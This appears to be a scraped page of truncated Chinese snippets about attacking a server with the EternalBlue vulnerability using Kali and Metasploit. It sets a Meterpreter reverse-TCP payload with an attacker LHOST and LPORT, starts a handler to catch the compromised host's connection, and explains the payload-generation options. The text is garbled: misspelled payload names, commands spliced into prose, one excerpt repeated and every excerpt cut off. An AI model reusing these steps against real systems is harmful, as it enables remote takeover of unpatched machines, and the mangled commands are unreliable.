使用kali工具对服务器的一次永恒之蓝漏洞攻击
set payload windowa/x64/meterpreter/reverse_tepaet lhost 192.168.157.13使用run命令启动这个handler就可以等待目标系统被感染之后返回的连接了。如果、set lport 4321一切顺利,我们可以获得一个用来控制目...
set payload windowa/x64/meterpreter/reverse_tepaet lhost 192.168.157.13使用run命令启动这个handler就可以等待目标系统被感染之后返回的连接了。如果、set lport 4321一切顺利,我们可以获得一个用来控制目...
metasploit 的参数如下: -a x64 指明架构平台为64位 -platfrom 指明目标操作系统为windows -p 指明攻击载荷的类型 Ihost 指明主控端的 IP 地址。 lport 指明主控端的端口。 -e指明要使用的编码方式...